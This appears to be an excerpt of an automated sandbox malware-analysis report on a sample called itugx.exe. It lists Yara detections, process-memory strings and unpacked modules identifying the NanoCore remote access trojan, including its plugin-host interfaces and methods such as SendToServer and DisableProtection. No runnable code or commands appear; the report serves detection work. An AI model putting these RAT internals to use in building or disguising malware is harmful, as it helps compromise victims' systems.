Source: Yara match	File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

OS version to string mapping found (often used in BOTs)

Source: itugx.exe	Binary or memory string: WIN_81
Source: itugx.exe	Binary or memory string: WIN_XP
Source: itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: itugx.exe	Binary or memory string: WIN_XPe
Source: itugx.exe	Binary or memory string: WIN_VISTA
Source: itugx.exe	Binary or memory string: WIN_7
Source: itugx.exe	Binary or memory string: WIN_8

Remote Access Functionality

Detected Nanocore Rat

Source: itugx.exe, 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: itugx.exe, 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
